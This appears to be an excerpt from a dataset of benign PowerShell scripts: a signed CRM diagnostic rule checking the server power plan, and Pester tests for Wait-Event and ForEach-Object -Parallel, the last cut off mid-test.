# Rule ID: 3416 # # Rule checking to see if Power Plan of the server is set to High Performance # # Created: 7/19/2012 # Author: Jonathan Randall #****************************************************************************************************************** Import-LocalizedData -BindingVariable LocalizedMessages Write-DiagProgress -Activity $LocalizedMessages.PROGRESSBAR_ID_CRM_POWERPLAN_CHECK -Status $LocalizedMessages.PROGRESSBAR_ID_CRM_POWERPLAN_CHECKDesc "--> Entered TS_CRM_PowerPlanSettingCheck.ps1" | WriteTo-StdOut $RootCauseDetected=$false $active_plan = Get-WindowsPowerPlan if ($active_plan -ne " " -and $active_plan.toLower() -ne "high performance"){ $RootCauseDetected = $true Write-GenericMessage -RootCauseID "RC_PowerPlanNotHighPerformance" -Verbosity "Warning" -SolutionTitle "Degraded overall performance on Windows Server " -PublicContentUrl "http://support.microsoft.com/kb/2207548/en-us" -ProcessName "W3WP.exe" } if ($RootCauseDetected -eq $true) { Update-DiagRootCause -Id "RC_PowerPlanNotHighPerformance" -Detected $true if ($Error.Count -gt 0) { ("ERROR=" + $Error) | WriteTo-StdOut } } else{ Update-DiagRootCause -Id "RC_PowerPlanNotHighPerformance" -Detected $false } "<-- Exited TS_CRM_PowerPlanSettingCheck.ps1" | WriteTo-StdOut # SIG # Begin signature block # MIIoVQYJKoZIhvcNAQcCoIIoRjCCKEICAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCr5kx21gUFkTEx # +dFi7sLEmk2nC0EBWYkpCOXqabJhKqCCDYUwggYDMIID66ADAgECAhMzAAAEA73V # lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV # LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY # oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi # kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/ # /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv # ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r # EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV # NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC # rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos # oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB # +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO # raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+ # sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W # +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s # IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu # iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGiYwghoiAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA # BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIM6s # cAssSuO5zAFMzyYQMQcZbA0ImxmdCVw8oEMbU3sTMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAadc9Zg4QRU/5Ne210WfVNMi1ouXYLJr8dG31 # PG+ntYagLbUmq5X6P1K6R77E/d3tz4tE0/dYGp7+jXg6W8CE84lNocFPsc6Z/WPi # oPTCNoSGRlJtoco5P93Io/5Qp9AwVwn6hgD1/h/qCVt0vnvrbhTJyEk8KuTRzZ3y # kKNzk8wFlXydG8Z3KLYzbBWezWzwJykoEMpVVzv5RxW7xqXIpNX0p84Fy5+MNj7d # bcdTRrNK/qljEGPxABL/LFT2h0CyTLumcKsRIONHt81zX7lA+pVo1IFxhAyRiQdo # IiHgqSgOa4u25aMUesIYJpracNh1qHcfCgjyHmm0lXt65/c10aGCF7AwghesBgor # BgEEAYI3AwMBMYIXnDCCF5gGCSqGSIb3DQEHAqCCF4kwgheFAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFaBgsqhkiG9w0BCRABBKCCAUkEggFFMIIBQQIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCAW3z9pYB4JpjocXTcwDBzbwe+2s1FsWcbe # GznPKAw5JgIGZuto66IvGBMyMDI0MTAyODExNDA0MC44NzZaMASAAgH0oIHZpIHW # MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT # Hm5TaGllbGQgVFNTIEVTTjo1NzFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z # b2Z0IFRpbWUtU3RhbXAgU2VydmljZaCCEf4wggcoMIIFEKADAgECAhMzAAAB+8vL # bDdn5TCVAAEAAAH7MA0GCSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w # IFBDQSAyMDEwMB4XDTI0MDcyNTE4MzExM1oXDTI1MTAyMjE4MzExM1owgdMxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jv # c29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMeblNoaWVs # ZCBUU1MgRVNOOjU3MUEtMDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGlt # ZS1TdGFtcCBTZXJ2aWNlMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA # qMJWQeWAq4LwvSjYsjP0Uvhvm0j0aAOJiMLg0sLfxKoTXAdKD6oMuq5rF5oEiOxV # +9ox0H95Q8fhoZq3x9lxguZyTOK4l2xtcgtJCtjXRllM2bTpjOg35RUrBy0cAloB # U9GJBs7LBNrcbH6rBiOvqDQNicPRZwq16xyjMidU1J1AJuat9yLn7taifoD58blY # EcBvkj5dH1la9zU846QDeOoRO6NcqHLsDx8/zVKZxP30mW6Y7RMsqtB8cGCgGwVV # urOnaNLXs31qTRTyVHX8ppOdoSihCXeqebgJCRzG8zG/e/k0oaBjFFGl+8uFELwC # yh4wK9Z5+azTzfa2GD4p6ihtskXs3lnW05UKfDJhAADt6viOc0Rk/c8zOiqzh0lK # pf/eWUY2o/hvcDPZNgLaHvyfDqb8AWaKvO36iRZSXqhSw8SxJo0TCpsbCjmtx0Lp # Hnqbb1UF7cq09kCcfWTDPcN12pbYLqck0bIIfPKbc7HnrkNQks/mSbVZTnDyT3O8 # zF9q4DCfWesSr1akycDduGxCdKBvgtJh1YxDq1skTweYx5iAWXnB7KMyls3WQZbT # ubTCLLt8Xn8t+slcKm5DkvobubmHSriuTA3wTyIy4FxamTKm0VDu9mWds8MtjUSJ # VwNVVlBXaQ3ZMcVjijyVoUNVuBY9McwYcIQK62wQ20ECAwEAAaOCAUkwggFFMB0G # A1UdDgQWBBRHVSGYUNQ3RwOl71zIAuUjIKg1KjAfBgNVHSMEGDAWgBSfpxVdAF5i # XYP05dJlpxtTNRnpcjBfBgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jv # c29mdC5jb20vcGtpb3BzL2NybC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENB # JTIwMjAxMCgxKS5jcmwwbAYIKwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRw # Oi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRp # bWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1Ud # JQEB/wQMMAoGCCsGAQUFBwMIMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsF # AAOCAgEAwzoIKOY2dnUjfWuMiGoz/ovoc1e86VwWaZNFdgRmOoQuRe4nLdtZONtT # HNk3Sj3nkyBszzxSbZEQ0DduyKHHI5P8V87jFttGnlR0wPP22FAebbvAbutkMMVQ # MFzhVBWiWD0VAnu9x0fjifLKDAVXLwoun5rCFqwbasXFc7H/0DPiC+DBn3tUxefv # cxUCys4+DC3s8CYp7WWXpZ8Wb/vdBhDliHmB7pWcmsB83uc4/P2GmAI3HMkOEu7f # CaSYoQhouWOr07l/KM4TndylIirm8f2WwXQcFEzmUvISM6ludUwGlVNfTTJUq2bT # DEd3tlDKtV9AUY3rrnFwHTwJryLtT4IFhvgBfND3mL1eeSakKf7xTII4Jyt15SXh # Hd5oI/XGjSgykgJrWA57rGnAC7ru3/ZbFNCMK/Jj6X8X4L6mBOYa2NGKwH4A37YG # DrecJ/qXXWUYvfLYqHGf8ThYl12Yg1rwSKpWLolA/B1eqBw4TRcvVY0IvNNi5sm+ # //HJ9Aw6NJuR/uDR7X7vDXicpXMlRNgFMyADb8AFIvQPdHqcRpRorY+YUGlvzeJx # /2gNYyezAokbrFhACsJ2BfyeLyCEo6AuwEHn511PKE8dK4JvlmLSoHj7VFR3NHDk # 3zRkx0ExkmF8aOdpvoKhuwBCxoZ/JhbzSzrvZ74GVjKKIyt5FA0wggdxMIIFWaAD # AgECAhMzAAAAFcXna54Cm0mZAAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYD # VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe # MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3Nv # ZnQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIy # MjVaFw0zMDA5MzAxODMyMjVaMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo # aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y # cG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEw # MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5 # vQ7VgtP97pwHB9KpbE51yMo1V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64 # NmeFRiMMtY0Tz3cywBAY6GB9alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhu # je3XD9gmU3w5YQJ6xKr9cmmvHaus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl # 3GoPz130/o5Tz9bshVZN7928jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPg # yY9+tVSP3PoFVZhtaDuaRr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I # 5JasAUq7vnGpF1tnYN74kpEeHT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2 # ci/bfV+AutuqfjbsNkz2K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/ # TNuvXsLz1dhzPUNOwTM5TI4CvEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy # 16cg8ML6EgrXY28MyTZki1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y # 1BzFa/ZcUlFdEtsluq9QBXpsxREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6H # XtqPnhZyacaue7e3PmriLq0CAwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMB # AAEwIwYJKwYBBAGCNxUCBBYEFCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQW # BBSfpxVdAF5iXYP05dJlpxtTNRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30B # ATBBMD8GCCsGAQUFBwIBFjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3Bz # L0RvY3MvUmVwb3NpdG9yeS5odG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYB # BAGCNxQCBAweCgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMB # Af8wHwYDVR0jBBgwFoAU1fZWy4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBL # oEmgR4ZFaHR0cDovL2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMv # TWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggr # BgEFBQcwAoY+aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNS # b29DZXJBdXRfMjAxMC0wNi0yMy5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1Vffwq # reEsH2cBMSRb4Z5yS/ypb+pcFLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27 # DzHkwo/7bNGhlBgi7ulmZzpTTd2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pv # vinLbtg/SHUB2RjebYIM9W0jVOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9Ak # vUCgvxm2EhIRXT0n4ECWOKz3+SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWK # NsIdw2FzLixre24/LAl4FOmRsqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2 # kQH2zsZ0/fZMcm8Qq3UwxTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+ # c23Kjgm9swFXSVRk2XPXfx5bRAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep # 8beuyOiJXk+d0tBMdrVXVAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+Dvk # txW/tM4+pTFRhLy/AsGConsXHRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1Zyvg # DbjmjJnW4SLq8CdCPSWU5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/ # 2XBjU02N7oJtpQUQwXEGahC0HVUzWLOhcGbyoYIDWTCCAkECAQEwggEBoYHZpIHW # MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT # Hm5TaGllbGQgVFNTIEVTTjo1NzFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z # b2Z0IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUABHHn7NCGusZz # 2RfVbyuwYwPykBWggYMwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx # MDANBgkqhkiG9w0BAQsFAAIFAOrJT0swIhgPMjAyNDEwMjcyMzQ2MTlaGA8yMDI0 # MTAyODIzNDYxOVowdzA9BgorBgEEAYRZCgQBMS8wLTAKAgUA6slPSwIBADAKAgEA # AgINvAIB/zAHAgEAAgIUvzAKAgUA6sqgywIBADA2BgorBgEEAYRZCgQCMSgwJjAM # BgorBgEEAYRZCgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEB # CwUAA4IBAQCt9+78tOBk3G7InFWNeSnv+gNf7827NofcCXCIrLQa834+WZOE6YjV # cA8B4zRZWYQt61ryjsP7nO4QK9AT7twzBe+cVhqFCO+umtt9HILo/02fBvZqGhC0 # aABNMEKKtN5mHLc0RqyRjYVeyJJgW3o+AuIAomNefMMnMlPFbCzeVx+VWfowu6aZ # GIf20olcJr1Udx5TxmnYdsKjQyDDl6Lmtl54TbeWFF6Uai0RRHKqDZXeiYK0nnaz # QchF9LlhnVpwArQ160lunLrYsrAoYdqLC+X0Bz+PmzShMHudHvUpm9HSYaJSjBDw # /SBZA3RVy2I0EMGwb608ErihFwOktb8UMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UE # BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc # BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0 # IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAH7y8tsN2flMJUAAQAAAfswDQYJYIZI # AWUDBAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG # 9w0BCQQxIgQgq1MY/LUDeDcxiglOOpRDF0lW8/3SmJ5/L2EzyMSgyQ4wgfoGCyqG # SIb3DQEJEAIvMYHqMIHnMIHkMIG9BCA52wKr/KCFlVNYiWsCLsB4qhjEYEP3xHqY # qDu1SSTlGDCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5n # dG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9y # YXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMz # AAAB+8vLbDdn5TCVAAEAAAH7MCIEIOcOJM95z1rtLRPImI9GcCxcLV/lXPRviSc4 # qDRq2ZeFMA0GCSqGSIb3DQEBCwUABIICAJ7YCTy7M+SSkoPzWYnx52LBcsS9BrJl # 5wBIgxepC/aWfGg8Cb86ZeqoDnU9flEAeNXVl86lVKWWEqbIYeQzT3lIXKBUzEDd # 2YBHDJwXuw86EvT/edCSFGCIYVFSvwnVzkDmus0A19m6vKsoJ5jF76xxWgviYL7p # K0Nipw58jqszCcV1YAC3e7w2ag1A0D4kmu5yESP1+M3Sye7VixmsEI4VBlF+NsJw # 5WGNK2IXahVbCZqp5hQw0EziRmblm0kLfRU6PECV62MrU49O8Nx25DwWh6yiGz7t # z+BmAqLzVEMZ/UqWpBgGi76e2udErK4/o3iu10BdOp97TymrFWTXd3vijtAahtlI # O/cNnMCeMs34sKZzWTc4Ffl8N/w4utOap+kVLvf1i5JEMz+8OP5h9ceOTesyx6s7 # KwzN2RbCDH5OoMbAkSxTMKcTgbIExXRKfa6FyyuvyJ0LCfZIeKVBZmaN/7LHJqhI # h31dj/x0pn9Pwm0gqwSVwiAEvDCnj2hhSNvdBwTSMAaPNL7xAd4q7ZVzDQN0TWg5 # bD1MXon9q6DhSEhy7xNkvFCt+yiE0++6hItdoLc+wWiXtZ/lUTnZJgTl8IE5PD2a # VeRmyB4toS0vGxiv1drNTTcPIJ62blyzkbfAeLFeyjvWLMPebuTpM2LYbpnjXrFM # Q9ZuB+7QYRsP # SIG # End signature block
combined_dataset/train/non-malicious/1881.ps1
1881.ps1
Describe "Wait-Event" -Tags "CI" { Context "Validate Wait-Event is waiting for events" { It "Should time out when it does not receive a FakeEvent" { $stopwatch = [System.Diagnostics.Stopwatch]::startNew() Wait-Event -Timeout 1 -SourceIdentifier "FakeEvent" $stopwatch.Stop() $stopwatch.ElapsedMilliseconds | Should -BeGreaterThan 500 $stopwatch.ElapsedMilliseconds | Should -BeLessThan 1500 } } }
combined_dataset/train/non-malicious/1891.ps1
1891.ps1
Describe 'ForEach-Object -Parallel Basic Tests' -Tags 'CI' { BeforeAll { $skipTest = -not $EnabledExperimentalFeatures.Contains('PSForEachObjectParallel') if ($skipTest) { Write-Verbose "Test Suite Skipped. The test suite requires the experimental feature 'PSForEachObjectParallel' to be enabled." -Verbose $originalDefaultParameterValues = $PSDefaultParameterValues.Clone() $PSDefaultParameterValues["it:skip"] = $true } else { $sb = { "Hello!" } } } AfterAll { if ($skipTest) { $global:PSDefaultParameterValues = $originalDefaultParameterValues } } It "Verifies dollar underbar variable" { $expected = 1..10 $result = $expected | ForEach-Object -Parallel { $_ } $result.Count | Should -BeExactly $expected.Count $result | Should -Contain 1 $result | Should -Contain 10 } It 'Verifies using variables' { $var = "Hello" $varArray = "Hello","There" $result = 1..1 | ForEach-Object -Parallel { $using:var; $using:varArray[1] } $result.Count | Should -BeExactly 2 $result[0] | Should -BeExactly $var $result[1] | Should -BeExactly $varArray[1] } It 'Verifies terminating error streaming' { $result = 1..1 | ForEach-Object -Parallel { throw 'Terminating Error!'; "Hello" } 2>&1 $result.Count | Should -BeExactly 1 $result.ToString() | Should -BeExactly 'Terminating Error!' $result.FullyQualifiedErrorId | Should -BeExactly 'PSTaskException' } It 'Verifies terminating error in multiple iterations' { $results = 1..2 | ForEach-Object 